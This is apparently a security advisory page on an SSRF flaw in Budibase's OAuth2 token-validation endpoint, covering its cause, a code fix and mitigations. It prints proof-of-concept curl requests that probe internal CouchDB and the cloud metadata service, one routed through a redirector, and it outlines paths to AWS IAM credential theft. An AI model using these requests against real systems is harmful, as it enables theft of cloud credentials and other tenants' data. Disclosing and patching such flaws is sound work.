Budibase OAuth2 SDK Server-Side Request Forgery (SSRF), CVE-2026-48146 (High) -DC-Jun2026-563

By /

Listen to this Post

How CVE-2026-48146 Works

Budibase is an open-source low-code platform that provides OAuth2 authentication integration capabilities. The platform includes an OAuth2 SDK with a `fetchToken` function located in packages/server/src/sdk/workspace/oauth2/utils.ts. This function is responsible for exchanging OAuth2 authorization codes for access tokens by making outbound HTTP POST requests to OAuth2 provider token endpoints.
The vulnerability arises because `fetchToken` uses a raw `node-fetch` call to make this outbound request without applying the SSRF protection mechanisms that are consistently used elsewhere in the codebase. The Budibase codebase has a comprehensive security control—blacklist.isBlacklisted()—that blocks requests to private IP ranges including 127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. Every other outbound fetch path—including automation steps, plugin downloads, object store operations, and outgoing webhooks—routes through either `blacklist.isBlacklisted()` or the `fetchWithBlacklist()` wrapper. The OAuth2 token fetch path bypasses all of these checks entirely.
The Joi schema that validates the OAuth2 configuration URL imposes no scheme or host restrictions, allowing any string to be accepted. Furthermore, the `fetchConfig` used by `fetchToken` specifies `redirect: “follow”` (the default behavior), meaning that even if a public URL is initially provided, a 302 redirect can chain to an internal target, defeating superficial URL validation attempts.
The most direct attack vector is the `/api/oauth2/validate` endpoint, which lives on `builderRoutes` and is accessible to any user with the BUILDER role. This endpoint accepts a URL from the request body, passes it to fetchToken, and returns a validation envelope that includes the upstream error string—effectively leaking the response body of the internal service back to the attacker.
Because the vulnerable path does not consult the blacklist, an attacker with BUILDER privileges can point the OAuth2 token URL to internal services such as CouchDB (port 5984), cloud metadata endpoints (169.254.169.254), or any other network-reachable internal resource. The Budibase server will then connect to the specified internal target and return fragments of the response body in the validation error message.

DailyCVE Form

Platform: Budibase
Version: prior to 3.39.0
Vulnerability: Server-Side Request Forgery (SSRF)
Severity: High (CVSS 7.7)
Date: May 27, 2026

Prediction: Fixed in 3.39.0

What Undercode Say: Analytics

The following analytics demonstrate the vulnerability’s reach and the code paths involved:

Blacklist Configuration (Bypassed)

// packages/backend-core/src/blacklist/blacklist.ts:6-16
// Default blocked ranges:
// 127.0.0.0/8, 169.254.0.0/16, 10.0.0.0/8,
// 172.16.0.0/12, 192.168.0.0/16

Vulnerable fetchToken Implementation

// packages/server/src/sdk/workspace/oauth2/utils.ts:17-65
// NO blacklist.isBlacklisted() call
// NO redirect: "manual" setting
const resp = await fetch(config.url, fetchConfig)
// fetchConfig has redirect: "follow" (default)

Safe Outbound Fetch (Reference)

// packages/backend-core/src/utils/outboundFetch.ts:98-100
// Sets redirect: "manual" and re-validates each hop
// Uses blacklist.isBlacklisted() before fetch

Route Validation (No Restrictions)

// packages/server/src/api/routes/oauth2.ts:9
url: Joi.string().required()
// No scheme or host validation

Proof of Concept – CouchDB Probe

curl -sS -b "$BUILDER_COOKIE" -X POST "$BASE/api/oauth2/validate" \
-H "Content-Type: application/json" \
-d '{"url":"http://127.0.0.1:5984/","clientId":"t","clientSecret":"t",
"method":"BODY","grantType":"client_credentials"}'
Response: {"valid":false,"message":"Method Not Allowed"}

Proof of Concept – Cloud Metadata Probe

curl -sS -b "$BUILDER_COOKIE" -X POST "$BASE/api/oauth2/validate" \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/latest/meta-data/","clientId":"t",
"clientSecret":"t","method":"BODY","grantType":"client_credentials"}'
Response leaks: "invalid json response body ... reason: Unexpected token 'N', \"Not Found\""

Database Enumeration via Redirector

Enumerate all tenant databases on shared CouchDB
curl -sS -b "$BUILDER_COOKIE" -X POST "$BASE/api/oauth2/validate" \
-H "Content-Type: application/json" \
-d '{"url":"http://public-redirector.com/redirect?target=http://127.0.0.1:5984/_all_dbs",
"clientId":"t","clientSecret":"t","method":"BODY","grantType":"client_credentials"}'

How Exploit: Attack Vectors

Attack Vector 1: Cross-Tenant Data Exfiltration (Budibase Cloud)

On Budibase Cloud, multiple tenants share a single CouchDB instance running on port 5984. Each tenant’s data is stored in separate databases named `_global-db` and app_<id>. By pointing the OAuth2 token URL to http://127.0.0.1:5984/_all_dbs` (via a 302 redirector to bypass direct IP blocking if attempted), an attacker can enumerate every tenant's databases. From there, they can read `_users` tables, app definitions, and datasource configurations containing third-party credentials. None of this traffic passes through Budibase's tenant isolation layer.
<h2 style="color: blue;">Attack Vector 2: Cloud IAM Credential Theft</h2>
By setting the OAuth2 token URL tohttp://169.254.169.254/latest/meta-data/iam/security-credentials//, the attacker can retrieve the AWS instance role credentials associated with the Budibase server. These credentials carry whatever AWS permissions the Budibase instance role holds—potentially enabling full cloud account compromise. On GCP deployments, this leads to OAuth2 token theft with cloud-platform scope.
<h2 style="color: blue;">Attack Vector 3: Internal Network Enumeration</h2>
Self-hosted deployments face the same risks for CouchDB, Redis, MinIO, and any other service reachable from the Budibase pod or host network. The attack enables full internal network enumeration.
<h2 style="color: blue;">Exploit Requirements</h2>
- Valid Budibase account with BUILDER role privileges
- Network access to the Budibase server's `/api/oauth2/validate` endpoint
- No additional authentication or authorization checks beyond the BUILDER role
<h2 style="color: blue;">CVSS Score</h2>
- CVE-2026-48146: CVSS 3.1 Base Score 7.7 (High) — Vector: `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N`
- CVE-2026-48153: CVSS 3.1 Base Score 8.5 (High) — Vector: `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N`
<h2 style="color: blue;">Protection: From This CVE</h2>
<h2 style="color: blue;">Recommended Fix</h2>
Apply the SSRF protection pattern used elsewhere in the codebase by modifying `fetchToken` inpackages/server/src/sdk/workspace/oauth2/utils.ts:

import { blacklist } from "@budibase/backend-core"
async function fetchToken(config: { url: string; / ... / }) {
config = await processEnvironmentVariable(config)
// Add blacklist check
if (await blacklist.isBlacklisted(config.url)) {
throw new Error("OAuth2 token URL is blocked.")
}
const fetchConfig: RequestInit = {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: new URLSearchParams({ grant_type: "client_credentials" }),
redirect: "manual", // Critical: prevent redirect-based SSRF
}
// ...
}

Alternatively, replace the raw `fetch` call withfetchWithBlacklist()`, which handles both the blacklist check and re-validates redirect targets.

Mitigation for Unpatched Systems

1. Upgrade to Budibase 3.39.0 or newer

  1. Restrict BUILDER role so that only trusted administrators can modify OAuth2 configurations
  2. Network firewall or internal DNS policy to prevent the Budibase server from accessing internal service URLs
  3. Remove the ability to set OAuth2 token URLs entirely if not required

Impact

Confidentiality Impact: High

The vulnerability enables exfiltration of:

  • Cloud IAM credentials (AWS, GCP, Azure) with full cloud-platform scope
  • Cross-tenant data on Budibase Cloud, including other tenants’ app definitions, user databases, and datasource configurations containing third-party secrets
  • Internal service data from CouchDB, Redis, MinIO, Kubernetes APIs, and other pods on the internal network
  • Full internal network enumeration
    Integrity Impact: Low to None (CVE-2026-48146) / Low (CVE-2026-48153)
    The vulnerability is primarily read-only, though CVE-2026-48153 allows limited integrity impact.

Availability Impact: None

The vulnerability does not directly affect system availability.

Affected Environments

  • All deployment types: AWS, GCP, Azure, bare-metal, Docker Compose, Kubernetes
  • Budibase versions: All versions prior to 3.39.0
  • Attackers: Any authenticated user with BUILDER role privileges

CVSS Summary

| Metric | CVE-2026-48146 | CVE-2026-48153 |

|–|-|-|

| Base Score | 7.7 (High) | 8.5 (High) |

| Attack Vector | Network | Network |

| Attack Complexity | Low | Low |

| Privileges Required | Low | Low |

| User Interaction | None | None |

| Scope | Changed | Changed |

| Confidentiality | High | High |

| Integrity | None | Low |

| Availability | None | None |

Found by aisafe.io

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top